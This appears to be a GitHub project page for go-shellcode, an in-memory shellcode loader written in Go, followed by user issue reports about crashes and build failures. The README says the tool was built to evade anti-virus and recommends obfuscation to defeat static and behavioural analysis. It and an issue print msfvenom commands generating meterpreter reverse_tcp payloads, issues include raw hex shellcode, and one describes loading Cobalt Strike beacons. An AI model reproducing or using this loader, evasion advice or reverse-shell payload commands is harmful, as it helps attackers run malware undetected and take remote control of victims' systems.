
go-shellcode's Introduction

shellcode

This is a program that runs shellcode as its own process, entirely from memory. It was written to defeat anti-virus detection, but is now detected as VirTool:Win32/Shrine.A. Use a tool like garble to obfuscate the binary to defeat static analysis. Change the code yourself to defeat behavior analysis.

Usage

Keep in mind that only 64-bit shellcode will run in a 64-bit process; the tool cannot autodetect your shellcode's architecture.

Use msfvenom or metasploit to generate a bit of shellcode in hex format:

$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:\windows\temp>sc.exe …

Sometimes the hex shellcode is longer than the command line allows for arguments. Try putting the whole command in a batch script instead.

Build

Standard Go build steps: set GOOS to windows and GOARCH to match your shellcode, either 386 or amd64. The build cannot detect the architecture of your shellcode.

The resulting binary is a little big (2.1M), but compresses well with UPX, to roughly 508K.

go-shellcode's People

Contributors

brimstone, ilyapashuk

go-shellcode's Issues

win10 x64 EXE shellcode run error

os:windows 10 20H2 19042.1110

shellcode

msfvenom -p windows/exec CMD=calc.exe -b "x00" -f hex

run error

C:\Users\Administrator\go\src\go-shellcode>main.exe 33c983e9cfe8ffffffffc05e81760e1a7a45f883eefce2f4e692c7f81a7a2571ff4b859c912a75734876ceaa0ef137d015cd0fde2b85e9c47b0647d43abb8af51bbda70a482dceaa0af10fc491365480f93244294bf11cd81ba9ceb102997fb1914ecef9cc4bba54dbb548f9dd42a58dec7938002107618dfe22cea03e7b969e91760e734266442b917ecef9caf301dc3e211e9943201407fa251aa29168ae75471044759fc845f81a2a2dc99115c207cfc1b54db82c2d5e8fc7d807cf46438410fabe186f7ffebf09082a921a29ba2d791b299b341f3d9d1a7a45f8
Exception 0xc0000005 0x1 0xe471c 0xc0000e470c
PC=0xc0000e470c

runtime: unknown pc 0xc0000e470c
stack: frame={sp:0xc0000d5e50, fp:0x0} stack=[0xc0000c6000,0xc0000d6000)

win7 x64 EXE shellcode run error

Tested the project on Win7 x64 with Go version 13.5.
The configuration of GOOS and everything else is all correct; the only thing I changed is that I removed the unix part file, so the #include file missing error would not trouble me anymore.
Then I built the exe and just named it main.exe.
And the unexpected matter happened when I tried to run a calc.exe shellcode using the released exe.
Here are the output lines from CMD:

C:\Users\xxx\Documents\go-shellcode\cmd\sc>main.exe 33C050B82E646C6C50B8656C333250B86B65726E508BC450B87B1D807CFFD033C050B82E65786550B863616C63508BC46A0550B8AD23867CFFD033C050B8FACA817CFFD0

Exception 0xc0000005 0x8 0x7c801d7b 0x7c801d7b
PC=0x7c801d7b

runtime: unknown pc 0x7c801d7b
stack: frame={sp:0xc00007be08, fp:0x0} stack=[0xc000074000,0xc00007c000)

not return the shell to my debian

(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# ./main ./rev.hex
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# SIGILL: illegal instruction
PC=0x7f235430d004 m=0 sigcode=2
instruction bytes: 0x66 0x66 0x36 0x61 0x30 0x39 0x35 0x38 0x39 0x39 0x62 0x36 0x31 0x30 0x34 0x38

goroutine 0 [idle]:
runtime: unknown pc 0x7f235430d004
stack: frame={sp:0x7fff655a3c08, fp:0x0} stack=[0x7fff64da4c58,0x7fff655a3c90)

goroutine 1 [syscall]:
runtime.cgocall(0x48e0b0, 0xc000047f00)
/usr/lib/go-1.17/src/runtime/cgocall.go:156 +0x5c fp=0xc000047ed8 sp=0xc000047ea0 pc=0x403ebc
github.com/brimstone/go-shellcode._Cfunc_call(0xc000082000, 0x104)
_cgo_gotypes.go:44 +0x45 fp=0xc000047f00 sp=0xc000047ed8 pc=0x48dde5
github.com/brimstone/go-shellcode.Run(...)
/usr/lib/go-1.17/src/go-shellcode/shellcode_unix.go:32
main.main()
/usr/lib/go-1.17/src/go-shellcode/cmd/sc/main.go:35 +0x185 fp=0xc000047f80 sp=0xc000047f00 pc=0x48dfe5
runtime.main()
/usr/lib/go-1.17/src/runtime/proc.go:255 +0x227 fp=0xc000047fe0 sp=0xc000047f80 pc=0x433467
runtime.goexit()
/usr/lib/go-1.17/src/runtime/asm_amd64.s:1581 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0x45c601


not return the shell to my debian

build
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# go build -ldflags '-s -w -L /lib/x86_64-linux-gnu/*.so -linkmode "external" -extldflags "-static"' main.go

shellcode
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.2.128 lport=4444 -f hex -o rev.hex
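The instruction bytes in the Debian SIGILL report above are all ASCII characters from the hex alphabet (0x66 is 'f', 0x36 is '6', and so on), which is what the Go runtime prints when execution lands in undecoded hex text rather than in machine code. As an added crash-triage example, not part of the issue or of the go-shellcode project, the Go snippet below parses the runtime's "instruction bytes:" line (report text constructed from the values in the issue) and flags that condition; Triage, parseInstructionBytes and isHexText are hypothetical helper names.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Constructed sample in the shape the Go runtime prints on SIGILL; the byte
// values are copied from the Debian issue report above.
const sampleReport = `SIGILL: illegal instruction
PC=0x7f235430d004 m=0 sigcode=2
instruction bytes: 0x66 0x66 0x36 0x61 0x30 0x39 0x35 0x38 0x39 0x39 0x62 0x36 0x31 0x30 0x34 0x38`

// parseInstructionBytes pulls the byte values out of the runtime's
// "instruction bytes:" line. It returns nil, nil when the line is absent.
func parseInstructionBytes(report string) ([]byte, error) {
	for _, line := range strings.Split(report, "\n") {
		line = strings.TrimSpace(line)
		if !strings.HasPrefix(line, "instruction bytes:") {
			continue
		}
		var out []byte
		for _, tok := range strings.Fields(strings.TrimPrefix(line, "instruction bytes:")) {
			v, err := strconv.ParseUint(strings.TrimPrefix(tok, "0x"), 16, 8)
			if err != nil {
				return nil, fmt.Errorf("bad byte token %q: %w", tok, err)
			}
			out = append(out, byte(v))
		}
		return out, nil
	}
	return nil, nil
}

// isHexText reports whether every byte is an ASCII hex digit. Machine code
// almost never stays inside that narrow range for 16 bytes in a row, so a
// true result means the CPU was pointed at undecoded hex text.
func isHexText(b []byte) bool {
	if len(b) == 0 {
		return false
	}
	for _, c := range b {
		if !(c >= '0' && c <= '9') && !(c >= 'a' && c <= 'f') && !(c >= 'A' && c <= 'F') {
			return false
		}
	}
	return true
}

// Triage turns a SIGILL report into a one-line reading for whoever is
// looking at the crash.
func Triage(report string) (string, error) {
	b, err := parseInstructionBytes(report)
	if err != nil {
		return "", err
	}
	if b == nil {
		return "no instruction bytes line found in report", nil
	}
	if isHexText(b) {
		return fmt.Sprintf("bytes at PC are ASCII hex text %q: the hex payload was executed as text instead of being decoded first", string(b)), nil
	}
	return "bytes at PC are not hex text: the fault is inside decoded code", nil
}

func main() {
	msg, err := Triage(sampleReport)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Println(msg)
}
```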

Build failed

What is the reason that building with go build fails?

win10 x64 EXE shellcode run error

runtime: unknown pc 0x7fff8a4ea859
stack: frame={sp:0xc0000883a0, fp:0x0} stack=[0xc000082000,0xc00008a000)

no compile.. in Linux

hi, how to compile?) kali-linux
command: go build shellcode_windows.go

command-line-arguments
./shellcode_windows.go:8:26: undefined: syscall.NewLazyDLL

windows 10 x64 :

C:\Windows\system32>cd C:\Go\PROGRAMS\go-shellcode-master\

C:\Go\PROGRAMS\go-shellcode-master>set GOOS=windows

C:\Go\PROGRAMS\go-shellcode-master>set GOARCH=386

C:\Go\PROGRAMS\go-shellcode-master>go build shellcode_windows.go

C:\Go\PROGRAMS\go-shellcode-master>dir

03.01.2020 23:08 .
03.01.2020 23:08 ..
03.01.2020 23:08 .github
03.01.2020 23:08 cmd
03.01.2020 23:08 50 go.mod
03.01.2020 23:08 1 576 README.md
03.01.2020 23:08 581 shellcode_unix.go
03.01.2020 23:08 1 150 shellcode_windows.go

C:\Go\PROGRAMS\go-shellcode-master>

Cannot load the stageless shellcode generated by CS on amd64-arch

I have generated the following four beacons shellcode with CS:

payload_stageless_x64.bin
payload_stageless_x86.bin
payload_stage_x64.bin
payload_stage_x64.bin

Except for payload_stageless_x64.bin, everything else loaded and works well.

To reproduce

  1. Start CS, Attacks -> Packages -> Windows Executable (S) -> set output=Raw, set x64=true -> generate
  2. Modify the source code to read the file, then call the Run function
  3. Set env, build, and run

Thx for your excellent tool : )
